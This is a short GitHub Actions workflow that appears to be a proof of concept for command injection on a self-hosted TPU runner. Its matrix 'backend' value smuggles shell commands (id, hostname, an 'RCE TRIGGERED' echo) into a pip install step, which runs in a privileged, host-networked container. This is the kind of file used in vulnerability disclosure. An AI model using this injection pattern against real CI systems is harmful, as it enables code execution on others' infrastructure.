name: Keras TPU Original Runner Proof
on:
  push:
    branches: [ master ]
jobs:
  test-in-container:
    runs-on: linux-x86-ct6e-44-1tpu
    strategy:
      matrix:
        backend: ["jax; id; hostname; echo '--- RCE TRIGGERED ---'; #"]
    container:
      image: python:3.11-slim
      options: --privileged --network host
    steps:
      - uses: actions/checkout@v4
      - name: Install Dependencies
        run: pip install --no-cache-dir -r requirements-${{ matrix.backend }}-tpu.txt
